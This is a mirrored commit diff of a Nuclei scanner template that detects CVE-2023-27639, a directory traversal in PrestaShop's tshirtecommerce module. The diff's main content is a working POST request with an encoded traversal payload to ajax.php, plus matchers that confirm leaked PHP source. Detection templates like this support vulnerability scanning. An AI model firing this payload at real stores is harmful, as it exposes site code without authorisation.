daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated req,matcher & metadata

patch-1
Ritik Chaddha 2024-01-20 02:35:28 +05:30 committed by GitHub
parent e7ed4d1cb0
commit 71f681c9a7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
http/cves/2023/CVE-2023-27639.yaml
View File

@ -1,32 +1,43 @@
id: CVE-2023-27639 id: CVE-2023-27639
info: info:
name: PrestaShop tshirtecommerce Directory Traversal name: PrestaShop TshirteCommerce - Directory Traversal
author: MaStErChO author: MaStErChO
severity: high severity: high
description: | description: |
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files." The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.
reference: reference:
- https://www.cvedetails.com/cve/CVE-2023-27639/ - https://www.cvedetails.com/cve/CVE-2023-27639/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27639
classification:
cve-id: CVE-2023-27639
metadata: metadata:
max-request: 1 max-request: 1
product: tshirtecommerce verified: true
framework: prestashop framework: prestashop
shodan-query: http.component:"prestashop" product: tshirtecommerce
tags: cve,cve2023,prestashop,lfi google-query: inurl:"/tshirtecommerce/"
tags: cve,cve2023,prestashop,tshirtecommerce,lfi
http: http:
- method: POST - raw:
path: - |
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php" Host: {{Hostname}}
headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "SqlFormatter Examples" - "SqlFormatter Examples"
- type: word - "SqlFormatter"
words: - "<?php"
- "?php" condition: and
- type: status
status:
- 200